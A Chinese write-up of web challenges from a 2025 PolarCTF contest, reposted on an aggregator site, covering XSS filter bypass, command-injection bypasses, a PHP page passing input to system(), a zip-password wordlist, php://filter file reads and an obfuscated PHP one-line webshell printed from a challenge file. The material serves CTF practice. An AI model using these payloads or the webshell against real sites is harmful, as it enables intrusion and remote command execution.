2025 polarctf春季個人挑戰賽web方向wp

來個彈窗

先用最基礎的xss彈窗試一下

<script>alert("xss")</script>

沒有內容，猜測過濾了script，雙寫繞過一下

<scrscriptipt>alert("xss")</scscriptript>

background

查看網頁源代碼

查看一下js文件

類似于一個命令執行，d為輸出，p為動作

0e事件

考察MD5碰撞

復讀機RCE

提示不能說，嘗試echo一下

可以命令執行

xCsMsD

隨便注冊一個賬號登陸進去

在cmd框下可以執行命令，但是存在過濾

查看下cookies，解個碼

這里有一個替換，空格替換成-，\替換成/

所以這里就使用命令

cat-文件來讀取文件內容

這里可以使用tac繞過

coke的登陸

查看提示

猜測可能為密碼

成功登錄，flag在源代碼

bllbl_rce

掃描一下目錄，發現/admin/admin.php

下載源碼

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Command Query Tool</title>
</head>
<body>
<h1>Command Query Tool</h1>
<form action="index.php" method="post"><label for="command">輸入你的命令</label><input type="text" id="command" name="command" required><button type="submit">執行</button>
</form><?php
if (isset($_POST['command'])) {$command = $_POST['command'];if (strpos($command, 'bllbl') === false) {die("no");}echo "<pre>";system ($command);echo "</pre>";
}
?>
</body>
</html>

我們執行命令需要出現bllbl字符，這里可以用&&拼接

椰子樹暈淡水魚

猜測存在文件包含漏洞，掃描一下目錄：/password /admin.php

下載一個zip文件

爆破一下壓縮包密碼

密碼字典：

zhsh
2004
yzhsh
y2004
y183
zhshy
zhshzhsh
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
yzhsh
y2004
y183
zhshy
zhsh920
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183

zhsh/zhsh920

一個文件上傳

再給我30元

查看網頁源代碼

提示參數為id

這里使用sqlmap

狗黑子CTF變強之路

掃描一下目錄：/admin.php

這里可能存在文件包含漏洞

使用為協議讀取一下admin.php

?page=php://filter/convert.base64-encode/resource=admin.php

解碼

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {// 硬編碼的用戶名和密碼$correctUsername = "ggouheizi";$correctPassword = "zigouhei";$username = $_POST['username'];$password = $_POST['password'];if ($username == $correctUsername && $password == $correctPassword) {// 登錄成功，直接跳轉到 gougougou.phpheader("Location: gougougou.php");exit;} else {$errorMessage = "用戶名或密碼錯誤，請重新輸入。";}
}
?><!DOCTYPE html>
<html><head><title>秘境遺跡</title><style>body {font-family: Arial, sans-serif;background-color: #f4f4f4;}form {background-color: white;padding: 20px;border-radius: 10px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);width: 300px;position: absolute;top: 50%;left: 50%;transform: translate(-50%, -50%);}label {display: block;margin-bottom: 5px;font-weight: bold;}input[type="text"],input[type="password"] {width: 100%;padding: 10px;margin-bottom: 15px;border: 1px solid #ccc;border-radius: 5px;box-sizing: border-box;transition: border-color 0.3s ease;}input[type="text"]:focus,input[type="password"]:focus {border-color: #4CAF50;}input[type="submit"] {padding: 10px 20px;background-color: #4CAF50;color: white;border: none;border-radius: 5px;cursor: pointer;transition: background-color 0.3s ease;}input[type="submit"]:hover {background-color: #45a049;}</style>
</head><body><form method="post"><label for="username">用戶名：</label><br><input type="text" name="username"><br><label for="password">密碼：</label><br><input type="password" name="password"><br><br><input type="submit" value="登錄"><?php if(isset($errorMessage)) { echo $errorMessage; }?></form>
</body></html>

再讀取gougougou.php文件

<?php 
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
?>

混淆解碼后為一句話木馬，密碼為cmd

小白說收集很重要

看題目意思就知道要目錄掃描

admin/admin123456

根據題目要求，生成密碼

sysadmin/xiaobai

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/73433.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/73433.shtml
英文地址，請注明出處：http://en.pswp.cn/web/73433.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！